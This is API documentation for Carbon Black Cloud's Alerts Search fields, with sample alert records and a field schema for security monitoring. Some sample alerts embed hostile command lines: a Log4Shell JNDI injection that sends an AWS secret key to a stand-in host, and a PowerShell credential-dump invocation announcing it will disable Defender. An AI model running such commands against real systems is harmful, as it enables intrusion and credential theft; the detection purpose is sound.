Search Fields - Alerts

Version: API v7

The following table lists the fields that can be returned in the response or used for searching with the Carbon Black Cloud using any of

Alerts Search API

Using the Schema

View the definition of each field, default values, whether it is required, searchable and/or tokenized. You can also see accepted values and routes supported per each field.

Possible Alert Types

Icons indicate the alert types a field is valid for.

CB_ANALYTICS - These fields are part of a CB Analytics alert type
CONTAINER_RUNTIME - These fields are part of a Container Runtime alert type
WATCHLIST - These fields are part of a Watchlist alert type
DEVICE_CONTROL - These fields are part of a Device Control alert type
HOST_BASED_FIREWALL - These fields are part of a Host Based Firewall alert type
INTRUSION_DETECTION_SYSTEM - These fields are part of a Intrusion Detection System alert type

FACET - These fields can be used for returning most prevalent values.

Note: For fields where the Alert Types Supported column contains no entries, this means this field is available only to MDR customers.

Alert Type Examples

IDS

    {
        "org_key":"ABCD1234",
        "alert_url":"defense-dev01.cbdtest.io/alerts?s[c][query_string]=id:ca316d99-a808-3779-8aab-62b2b6d9541c&orgKey=ABCD1234",
        "id":"ca316d99-a808-3779-8aab-62b2b6d9541c",
        "type":"INTRUSION_DETECTION_SYSTEM",
        "backend_timestamp":"2023-02-03T17:27:33.007Z",
        "user_update_timestamp":null,
        "backend_update_timestamp":"2023-02-03T17:27:33.007Z",
        "detection_timestamp":"2023-02-03T17:22:03.945Z",
        "first_event_timestamp":"2023-02-03T17:22:03.945Z",
        "last_event_timestamp":"2023-02-03T17:22:03.945Z",
        "severity":1,
        "reason":"HTTP traffic from asset DEV01-39X-1 matched IDS signature for threat CVE-2021-44228 Exploit",
        "reason_code":"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D:B5974D4D-265E-4FAF-8F71-2F76AAD67857",
        "threat_id":"bbe232a02b6c5583786503c25fe9a1d29d6ed39d3a295a6ff5c07f81629d0017",
        "primary_event_id":"21AB6B27-9F72-11ED-A79A-005056A53F17",
        "policy_applied":"NOT_APPLIED",
        "run_state":"RAN",
        "sensor_action":"ALLOW",
        "workflow":{"change_timestamp":"2023-02-03T17:27:33.007Z",
        "changed_by_type":"SYSTEM",
        "changed_by":"ALERT_CREATION",
        "closure_reason":"NO_REASON",
        "status":"OPEN"},
        "determination":{"change_timestamp":"2023-02-03T17:27:33.007Z",
        "value":"NONE",
        "changed_by_type":"SYSTEM",
        "changed_by":"ALERT_CREATION"},
        "tags":null,
        "alert_notes_present":false,
        "threat_notes_present":false,
        "is_updated":false,
        "rule_category_id":"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D",
        "rule_id":"B5974D4D-265E-4FAF-8F71-2F76AAD67857",
        "device_id":17482451,
        "device_name":"DEV01-39X-1",
        "device_uem_id":"",
        "device_target_value":"MEDIUM",
        "device_policy":"Standard",
        "device_policy_id":165700,
        "device_os":"WINDOWS",
        "device_os_version":"Windows 10 x64",
        "device_username":"DemoMachine",
        "device_location":"UNKNOWN",
        "device_external_ip":"66.170.99.2",
        "device_internal_ip":"10.203.105.21",
        "mdr_alert":false,
        "mdr_alert_notes_present":false,
        "mdr_threat_notes_present":false,
        "ttps":[],
        "attack_tactic":"TA0001",
        "attack_technique":"T1190",
        "process_guid":"ABCD1234-010ac2d3-00001694-00000000-1d937f40884b9e0",
        "process_pid":5780,
        "process_name":"c:\\windows\\system32\\curl.exe",
        "process_sha256":"d76d08c04dfa434de033ca220456b5b87e6b3f0108667bd61304142c54addbe4",
        "process_md5":"eac53ddafb5cc9e780a7cc086ce7b2b1",
        "process_effective_reputation":"TRUSTED_WHITE_LIST",
        "process_reputation":"TRUSTED_WHITE_LIST",
        "process_cmdline":"curl  -H \"Host: \\${jndi:ldap://\\{env:AWS_SECRET_ACCESS_KEY}.badserver.io}\" http://google.com/testingids",
        "process_username":"DEV01-39X-1\\bit9qa",
        "process_issuer":["Microsoft Windows Production PCA 2011"],
        "process_publisher":["Microsoft Windows"],
        "parent_guid":"ABCD1234-010ac2d3-0000225c-00000000-1d9300e2bb5211a",
        "parent_pid":8796,
        "parent_name":"c:\\windows\\system32\\cmd.exe",
        "parent_sha256":"b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450",
        "parent_md5":"8a2122e8162dbef04694b9c3e0b6cdee",
        "parent_effective_reputation":"TRUSTED_WHITE_LIST",
        "parent_reputation":"TRUSTED_WHITE_LIST",
        "parent_cmdline":"\"C:\\WINDOWS\\system32\\cmd.exe\" ",
        "parent_username":"DEV01-39X-1\\bit9qa",
        "childproc_guid":"",
        "childproc_username":"",
        "childproc_cmdline":"",
        "netconn_remote_port":80,
        "netconn_local_port":49233,
        "netconn_protocol":"",
        "netconn_remote_domain":"google.com",
        "netconn_remote_ip":"142.250.189.174",
        "netconn_local_ip":"10.203.105.21",
        "netconn_remote_ipv4":"142.250.189.174",
        "netconn_local_ipv4":"10.203.105.21",
        "tms_rule_id":"4b98443a-ba0d-4ff5-b99e-e5e70432a214",
        "threat_name":"CVE-2021-44228 Exploit",
        "threat_hunt_id": "0ff0725d-22c0-4b8f-95ea-a798e544e408",
        "threat_hunt_name": "GroutLoader Test"
    }

Container Runtime

   {
        "org_key":"ABCD1234",
        "alert_url":"defense-dev01.cbdtest.io/alerts?s[c][query_string]=id:f0c7970b-f23c-919e-0cd8-7a38bd373a6f&orgKey=ABCD1234",
        "id":"f0c7970b-f23c-919e-0cd8-7a38bd373a6f",
        "type":"CONTAINER_RUNTIME",
        "backend_timestamp":"2023-02-06T00:13:37.663Z",
        "user_update_timestamp":"2023-04-13T11:55:52.550Z",
        "backend_update_timestamp":"2023-02-06T00:13:37.663Z",
        "detection_timestamp":"2023-02-06T00:10:51.176Z",
        "first_event_timestamp":"2023-02-06T00:09:19.320Z",
        "last_event_timestamp":"2023-02-06T00:09:19.320Z",
        "severity":5,
        "reason":"Detected a connection to a public destination that isn't allowed for this scope",
        "reason_code":"2e5170e7-2665-49d2-829e-f5bdeefe6b06:f8b1637a-dc0c-49bb-bc28-5b48f97e6d58",
        "threat_id":"0811c72d38d40951b4b90dba05638a20669c9f001ea2e65eeb4768f813d6ed0c",
        "primary_event_id":"X0z55sxeTGWPfKuzPkFlCg-61",
        "policy_applied":"NOT_APPLIED",
        "run_state":"RAN",
        "sensor_action":"ALLOW",
        "workflow":{
            "change_timestamp":"2023-04-13T11:55:52.550Z",
            "changed_by_type":"USER",
            "changed_by":"janaw+csr@vmware.com",
            "closure_reason":"NO_REASON",
            "status":"IN_PROGRESS"
        },
        "determination":{
            "change_timestamp":"2023-02-22T21:07:57.955Z",
            "value":"NONE",
            "changed_by_type":"USER",
            "changed_by":"janaw+superadmin2@vmware.com"
        },
        "tags":["の結果"],
        "alert_notes_present":false,
        "threat_notes_present":true,
        "is_updated":false,
        "mdr_alert":false,
        "mdr_alert_notes_present":false,
        "mdr_threat_notes_present":false,
        "netconn_remote_port":443,
        "netconn_local_port":56618,
        "netconn_protocol":"TCP",
        "netconn_remote_domain":"westeurope.monitoring.azure.com",
        "netconn_remote_ip":"20.50.65.82",
        "netconn_local_ip":"10.244.2.22",
        "netconn_remote_ipv4":"20.50.65.82",
        "netconn_local_ipv4":"10.244.2.22",
        "k8s_cluster":"tomer:sensor-aks",
        "k8s_namespace":"kube-system",
        "k8s_kind":"DaemonSet",
        "k8s_workload_name":"ama-logs",
        "k8s_pod_name":"ama-logs-gm5tt",
        "k8s_policy_id":"2e5170e7-2665-49d2-829e-f5bdeefe6b06",
        "k8s_policy":"Big runtime policy",
        "k8s_rule_id":"f8b1637a-dc0c-49bb-bc28-5b48f97e6d58",
        "k8s_rule":"Allowed public destinations",
        "connection_type":"EGRESS",
        "egress_group_id":"",
        "egress_group_name":"",
        "ip_reputation":96,
        "remote_is_private":false
    }

Watchlist

    {
        "org_key":"ABCD1234",
        "alert_url":"defense.conferdeploy.net/alerts?s[c][query_string]=id:3d80bd8b-7770-40a7-8d6b-8268fb15c59f&orgKey=ABCD1234",
        "id":"3d80bd8b-7770-40a7-8d6b-8268fb15c59f",
        "type":"WATCHLIST",
        "backend_timestamp":"2023-07-17T17:21:34.063Z",
        "user_update_timestamp":null,
        "backend_update_timestamp":"2023-07-17T17:21:34.063Z",
        "detection_timestamp":"2023-07-17T17:21:13.483Z",
        "first_event_timestamp":"2023-07-17T17:19:00.412Z",
        "last_event_timestamp":"2023-07-17T17:19:00.412Z",
        "severity":10,
        "reason":"Process powershell.exe was detected by the report \"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior\" in watchlist \"AMSI Threat Intelligence\"",
        "reason_code":"cf4e6de7-4aa8-3188-8034-6a54fdea940c:e17d957d-b504-3462-816c-f182fe1d80ab",
        "threat_id":"CF4E6DE74AA8B188C0346A54FDEA940C",
        "primary_event_id":"VUX7Bu7vTrWwnU8-uSVh1A-0",
        "policy_applied":"NOT_APPLIED",
        "run_state":"RAN",
        "sensor_action":"ALLOW",
        "workflow":{
            "change_timestamp":"2023-07-17T17:21:34.063Z",
            "changed_by_type":"SYSTEM",
            "changed_by":"ALERT_CREATION",
            "closure_reason":"NO_REASON",
            "status":"OPEN"
        },
        "determination":{
            "change_timestamp":"2023-07-17T17:21:34.063Z",
            "value":"NONE",
            "changed_by_type":null,
            "changed_by":null
        },
        "tags":null,
        "alert_notes_present":false,
        "threat_notes_present":false,
        "is_updated":false,
        "device_id":5890528,
        "device_name":"ABT102675",
        "device_uem_id":"596B6C4DD49AEF4AB3713363DDBB1F11",
        "device_target_value":"MEDIUM",
        "device_policy":"default",
        "device_policy_id":6525,
        "device_os":"WINDOWS",
        "device_os_version":"Windows 11 x64",
        "device_username":"DemoMachine",
        "device_location":"UNKNOWN",
        "device_external_ip":"49.206.61.4",
        "device_internal_ip":"192.168.0.104",
        "mdr_alert":false,
        "mdr_alert_notes_present":false,
        "mdr_threat_notes_present":false,
        "report_id":"LrKOC7DtQbm4g8w0UFruQg-b1c1ae83-f66b-4aa3-a496-363e296f4018",
        "report_name":"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior",
        "report_description":"Service accounts in Windows Active Directory environments have the ability to register under an AD security principle (user or computer) as a (SPN) Service Principal Name. The SPN registration allows for kerberos clients to request a kerberos service ticket associated with the service account SPN. This kerberos TGS is encrypted using the service accounts password. If a weak password is assigned to this service account an attacker can make an out of band request for one of these kerberos service tickets and crack it offline with tools like Jack the Ripper. This detection looks for fileless behaviors related to the out of band kerberos ticket request. If you are responding to this alert you should take immediate action and look at the process that alerted on this behavior as well as the other fileless script loads events.",
        "report_tags":[
            "credentialaccess",
            "t1558",
            "windows",
            "amsi",
            "attack",
            "attackframework"
        ],
        "report_link":"https://attack.mitre.org/techniques/T1558/003/",
        "ioc_id":"b1c1ae83-f66b-4aa3-a496-363e296f4018",
        "ioc_hit":"fileless_scriptload_cmdline:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\" OR scriptload_content:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\"",
        "watchlists":[{
            "id":"Ci7w5B4URg6HN60hatQMQ",
            "name":"AMSI Threat Intelligence"
        }],
        "process_guid":"ABCD1234-0059e1e0-00003544-00000000-1d9b8db27a4d423",
        "process_pid":13636,
        "process_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
        "process_sha256":"d436e66c0d092508e4b85290815ab375695fa9013c7423a3a27fed4f1acf90bd",
        "process_md5":"0499440c4b0783266183246e384c6657",
        "process_effective_reputation":"TRUSTED_WHITE_LIST",
        "process_reputation":"TRUSTED_WHITE_LIST",
        "process_cmdline":"powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -",
        "process_username":"NT AUTHORITY\\SYSTEM",
        "process_issuer":["Microsoft Windows Production PCA 2011"],
        "process_publisher":["Microsoft Windows"],
        "parent_guid":"ABCD1234-0059e1e0-00002890-00000000-1d9a898aa24acc9",
        "parent_pid":10384,
        "parent_name":"c:\\program files\\unowhy\\hisqool manager\\hisqoolmanager.exe",
        "parent_sha256":"4ab2c4932e01ab8460bd8bff5afb0c76e9e238c10ce47515be40c49f652d0282",
        "parent_md5":"c7e583681f0958d4f5d32afd09d8084b",
        "parent_effective_reputation":"NOT_LISTED",
        "parent_reputation":"NOT_LISTED",
        "parent_cmdline":"\"C:\\Program Files\\Unowhy\\HiSqool Manager\\HiSqoolManager.exe\" ",
        "parent_username":"NT AUTHORITY\\SYSTEM",
        "childproc_guid":"",
        "childproc_username":"",
        "childproc_cmdline":"",
        "ml_classification_final_verdict":"ANOMALOUS",
        "ml_classification_global_prevalence":"MEDIUM",
        "ml_classification_org_prevalence":"LOW"
    }

CB Analytics

    {
        "org_key":"ABCD1234",
        "alert_url":"defense.conferdeploy.net/alerts?s[c][query_string]=id:411eedfc-8408-2f9e-59f2-a83dfaae0ec1&orgKey=ABCD1234",
        "id":"411eedfc-8408-2f9e-59f2-a83dfaae0ec1",
        "type":"CB_ANALYTICS",
        "backend_timestamp":"2023-07-17T17:16:50.960Z",
        "user_update_timestamp":null,
        "backend_update_timestamp":"2023-07-17T17:29:19.996Z",
        "detection_timestamp":"2023-07-17T17:15:51.708Z",
        "first_event_timestamp":"2023-07-17T17:15:33.396Z",
        "last_event_timestamp":"2023-07-17T17:27:59.192Z",
        "severity":5,
        "reason":"A known virus (HackTool: Powerpuff) was detected running.",
        "reason_code":"T_REP_VIRUS",
        "threat_id":"9e0afc389c1acc43b382b1ba590498d2",
        "primary_event_id":"94953e4524c511ee86284f0541a5184d",
        "policy_applied":"NOT_APPLIED",
        "run_state":"RAN",
        "sensor_action":"ALLOW",
        "workflow":{
            "change_timestamp":"2023-07-17T17:16:50.960Z",
            "changed_by_type":"SYSTEM",
            "changed_by":"ALERT_CREATION",
            "closure_reason":"NO_REASON",
            "status":"OPEN"
        },
        "determination":{
            "change_timestamp":"2023-07-17T17:16:50.960Z",
            "value":"NONE",
            "changed_by_type":null,
            "changed_by":null
        },
        "tags":null,
        "alert_notes_present":false,
        "threat_notes_present":false,
        "is_updated":true,
        "device_id":6948863,
        "device_name":"Kognos-W19-CB-3",
        "device_uem_id":"",
        "device_target_value":"MISSION_CRITICAL",
        "device_policy":"SSQ_Policy",
        "device_policy_id":112221,
        "device_os":"WINDOWS",
        "device_os_version":"Windows Server 2019 x64",
        "device_username":"demouser@demo.org",
        "device_location":"OFFSITE",
        "device_external_ip":"34.234.170.45",
        "device_internal_ip":"10.0.14.120",
        "mdr_alert":false,
        "mdr_alert_notes_present":false,
        "mdr_threat_notes_present":false,
        "ttps":[
            "MALWARE_APP",
            "RUN_MALWARE_APP",
            "MITRE_T1059_CMD_LINE_OR_SCRIPT_INTER",
            "FILELESS",
            "MITRE_T1059_001_POWERSHELL"
        ],
        "attack_tactic":"",
        "attack_technique":"",
        "process_guid":"ABCD1234-006a07ff-00000e10-00000000-1d9b8d24ab16c73",
        "process_pid":3600,
        "process_name":"c:\\users\\administrator\\appdata\\local\\temp\\powerdump.ps1",
        "process_sha256":"3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0",
        "process_md5":"42a80cc2333b612b63a859f17474c9af",
        "process_effective_reputation":"KNOWN_MALWARE",
        "process_reputation":"KNOWN_MALWARE",
        "process_cmdline":"\"powershell.exe\" & {Write-Host \\\"\"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\\\"\" -fore green\nImport-Module \\\"\"$Env:Temp\\PowerDump.ps1\\\"\"\nInvoke-PowerDump}",
        "process_username":"KOGNOS-W19-CB-3\\Administrator",
        "process_issuer":[],
        "process_publisher":[],
        "parent_guid":"ABCD1234-006a07ff-00000fb8-00000000-1d9b8d2494e29ed",
        "parent_pid":4024,
        "parent_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
        "parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
        "parent_md5":"",
        "parent_effective_reputation":"TRUSTED_WHITE_LIST",
        "parent_reputation":"TRUSTED_WHITE_LIST",
        "parent_cmdline":"",
        "parent_username":"KOGNOS-W19-CB-3\\Administrator",
        "childproc_guid":"ABCD1234-006a07ff-00000000-00000000-19db1ded53e8000",
        "childproc_name":"",
        "childproc_sha256":"",
        "childproc_md5":"",
        "childproc_effective_reputation":"RESOLVING",
        "childproc_username":"KOGNOS-W19-CB-3\\Administrator",
        "childproc_cmdline":""
    }

Additional indicators

Searchable - Indicates that the field can be used in the criteria, exclusion or query elements of alerts requests e.g. process_name:chrome.exe
Searchable Array - Indicates that the field can be used in the criteria, exclusion or query elements of alerts requests and that in criteria and exclusion elements it is an array that may contain multiple values
Searchable Time Range - Indicates that the field can be used in the criteria, exclusion or query elements of alerts requests and that in criteria and exclusion elements it is an object with either start and end parameters or a range parameter. See Alerts API - Time Range Filter for more details.
Sortable - Indicates that the field can be used in sort request

Searching across both Endpoint Standard and Enterprise EDR data? See below for limitations.

Schema

Note: Additional details and examples can be found in the Carbon Black Cloud console search guide.

Field Name	Definition	Datatype	Alert Types Supported



`additional_events_present`	Indicator to let API and forwarder users know that they should look up other associated events related to this alert	Boolean	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
`alert_notes_present`	Searchable True if notes are present on the alert ID. False if notes are not present.	Boolean	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`alert_url`	Link to the alerts page for this alert. Does not vary by alert type	String	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`attack_tactic`	Searchable Array A tactic from the MITRE ATT&CK framework; defines a reason for an adversary’s action, such as achieving credential access	String	CB_ANALYTICS WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
`attack_technique`	Searchable Array A technique from the MITRE ATT&CK framework; defines an action an adversary takes to accomplish a goal, such as dumping credentials to achieve credential access	String	CB_ANALYTICS WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
`backend_timestamp` (Use `time_range` in search requests)	Searchable Time Range Sortable Timestamp when the Carbon Black Cloud processed and enabled the alert for searching. Corresponds to the Created column on the Alerts page. This field is searched by the `time_range` request field and defaults to the previous two weeks on requests that include this field.	ISO 8601 UTC Date String Note: This field is not valid in criteria. The top-level parameter `time_range` must be used. Uses the Time Range Object	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`backend_update_timestamp`	Searchable Time Range Sortable Timestamp when the Carbon Black Cloud initiated and processed an update to an alert. Corresponds to the Updated column on the Alerts page. Note that changes made by users do not change this date; those changes are reflected on `user_update_timestamp`	ISO 8601 UTC Date String Note: When used as criteria the search is within the period specified by `time_range` on that request and uses the Time Range Object	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`blocked_effective_reputation`	Searchable Array Effective reputation of the blocked file or process; applied by the sensor at the time the block occurred	String `ADAPTIVE_WHITE_LIST` `COMMON_WHITE_LIST` `COMPANY_BLACK_LIST` `COMPANY_WHITE_LIST` `PUP` `TRUSTED_WHITE_LIST` `RESOLVING` `COMPROMISED_OBSOLETE` `DLP_OBSOLETE` `IGNORE` `ADWARE` `HEURISTIC` `SUSPECT_MALWARE` `KNOWN_MALWARE` `ADMIN_RESTRICT_OBSOLETE` `NOT_LISTED` `GRAY_OBSOLETE` `NOT_COMPANY_WHITE_OBSOLETE` `LOCAL_WHITE` `NOT_SUPPORTED`	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
`blocked_md5`	Searchable Array MD5 hash of the child process binary; for any process terminated by the sensor	String	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
`blocked_name`	Searchable Array Tokenized file path of the files blocked by sensor action	String	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
`blocked_sha256`	Searchable Array SHA-256 hash of the child process binary; for any process terminated by the sensor	String	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
`childproc_cmdline`	Searchable Array Command line for the child process	String	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
`childproc_effective_reputation`	Searchable Array Effective reputation of the child process; applied by the sensor at the time the event occurred	String `ADAPTIVE_WHITE_LIST` `COMMON_WHITE_LIST` `COMPANY_BLACK_LIST` `COMPANY_WHITE_LIST` `PUP` `TRUSTED_WHITE_LIST` `RESOLVING` `COMPROMISED_OBSOLETE` `DLP_OBSOLETE` `IGNORE` `ADWARE` `HEURISTIC` `SUSPECT_MALWARE` `KNOWN_MALWARE` `ADMIN_RESTRICT_OBSOLETE` `NOT_LISTED` `GRAY_OBSOLETE` `NOT_COMPANY_WHITE_OBSOLETE` `LOCAL_WHITE` `NOT_SUPPORTED`	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
`childproc_guid`	Searchable Array Unique process identifier assigned to the child process	String	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
`childproc_md5`	Searchable Array Hash of the child process' binary (Enterprise EDR)	String	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
`childproc_name`	Searchable Array Filesystem path of the child process' binary	String	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
`childproc_sha256`	Searchable Array Hash of the child process' binary (Endpoint Standard)	String	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
`childproc_username`	Searchable Array User context in which the child process was executed	String	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
`connection_type`	Searchable Array Connection Type	String `INTERNAL_INBOUND` `INTERNAL_OUTBOUND` `INGRESS` `EGRESS`	CONTAINER_RUNTIME FACET
`detection_timestamp`	Searchable Time Range Sortable Timestamp when the alert was first detected. For sensor-sent alerts, this is the time of the event on the sensor. For alerts generated on the backend, this is the time the backend system triggered the alert.	ISO 8601 UTC Date String Note: When used as criteria the search is within the period specified by `time_range` on that request and uses the Time Range Object	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`determination`	User-updatable determination of the alert	Nested Response Object: `{ "determination": { "change_timestamp": "<string>", "changed_by": "<string>", "changed_by_type": "<string>", "value": "<string>" } }`	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`determination_change_timestamp`	Searchable Time Range When the determination was updated.	ISO 8601 UTC Date String	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`determination_changed_by`	User the determination was changed by.	String	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`determination_changed_by_type`	Searchable	String `SYSTEM` `USER` `API` `AUTOMATION`	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
`determination_value`	Searchable Array Determination of the alert set by a user	String `NONE` `TRUE_POSITIVE` `FALSE_POSITIVE`	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
`device_external_ip`	Searchable Array IP address of the endpoint according to the Carbon Black Cloud; can differ from device_internal_ip due to network proxy or NAT; either IPv4 (dotted decimal notation) or IPv6 (proprietary format)	String	CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`device_id`	Searchable Array ID of devices	Integer	CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
`device_internal_ip`	Searchable Array IP address of the endpoint reported by the sensor; either IPv4 (dotted decimal notation) or IPv6 (proprietary format)	String	CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`device_location`	Searchable Array Whether the device was on or off premises when the alert started, based on the current IP address and the device’s registered DNS domain suffix	String `ONSITE` `OFFSITE` `UNKNOWN`	CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`device_name`	Searchable Array Device name	String	CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
`device_os`	Searchable Array Device Operating Systems	String `WINDOWS` `MAC` `LINUX` `OTHER`	CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`device_os_version`	Searchable Array The operating system and version of the endpoint. Requires Windows CBC sensor version 3.5 or later.	String	CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`device_policy`	Searchable Array Device policy	String	CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
`device_policy_id`	Searchable Array Device policy id	Integer	CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`device_target_value`	Searchable Array Sortable Target value assigned to the device, set from the policy	String `LOW` `MEDIUM` `HIGH` `MISSION_CRITICAL`	CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`device_uem_id`	Searchable Array Device correlation with WS1/EUC, required for our Workspace ONE Intelligence integration to function	String	CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`device_username`	Searchable Array Users or device owners of alerts	String	CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`egress_group_id`	Searchable Array Unique identifier for the egress group	String	CONTAINER_RUNTIME
`egress_group_name`	Searchable Array Name of the egress group	String	CONTAINER_RUNTIME
`external_device_friendly_name`	Searchable Array Human-readable external device names	String	DEVICE_CONTROL FACET
`first_event_timestamp`	Searchable Time Range Sortable Timestamp when the first event in the alert occurred	ISO 8601 UTC Date String Note: When used as criteria the search is within the period specified by `time_range` on that request and uses the Time Range Object	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`id`	Searchable Array Unique IDs of alerts	String	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`ioc_field`	The field the indicator of comprise (IOC) hit contains	String	WATCHLIST
`ioc_hit`	IOC field value or IOC query that matches	String	WATCHLIST
`ioc_id`	Unique identifier of the IOC that generated the watchlist hit	String	WATCHLIST
`ip_reputation`	Searchable Array Range of reputations to accept for the remote IP: 0: unknown 1-20: high risk 21-40: suspicious 41-60: moderate 61-80: low risk 81-100: trustworthy There must be two values in this list. The first is the lower end of the range (inclusive) the second is the upper end of the range (inclusive)	Integer	CONTAINER_RUNTIME
`is_updated`	Set to true if this is an updated copy of the alert initiated by the Carbon Black Cloud backend. User workflow updates, such as adding a note, will generate a new copy of the alert, but `is_updated` will be set to false.	Boolean	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`k8s_cluster`	Searchable Array K8s Cluster name	String	CONTAINER_RUNTIME FACET
`k8s_kind`	Searchable Array K8s Workload kind	String	CONTAINER_RUNTIME
`k8s_namespace`	Searchable Array K8s namespace	String	CONTAINER_RUNTIME FACET
`k8s_pod_name`	Searchable Array Name of the pod within a workload	String	CONTAINER_RUNTIME
`k8s_policy`	Searchable Array Name of the K8s policy	String	CONTAINER_RUNTIME FACET
`k8s_policy_id`	Searchable Array Unique identifier for the K8s policy	String	CONTAINER_RUNTIME FACET
`k8s_rule`	Searchable Array Name of the K8s policy rule	String	CONTAINER_RUNTIME FACET
`k8s_rule_id`	Searchable Array Unique identifier for the K8s policy rule	String	CONTAINER_RUNTIME FACET
`k8s_workload_name`	Searchable Array Sortable K8s Workload Name	String	CONTAINER_RUNTIME FACET
`last_event_timestamp`	Searchable Time Range Sortable Timestamp when the last event in the alert occurred	ISO 8601 UTC Date String Note: When used as criteria the search is within the period specified by `time_range` on that request and uses the Time Range Object	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`mdr_alert`	Searchable Is the alert eligible for review by Carbon Black MDR Analysts?	Boolean	FACET
`mdr_alert_notes_present`	Searchable Customer visible notes at the alert level that were added by a MDR analyst	Boolean
`mdr_determination`	Mdr updatable classification of the alert	Nested Response Object: `{ "mdr_determination": { "change_timestamp": "<string>", "value": "<string>" } }`
`mdr_determination_change_timestamp`	Searchable Time Range When the last MDR classification change occurred	ISO 8601 UTC Date String Note: When used as criteria the search is within the period specified by `time_range` on that request and uses the Time Range Object
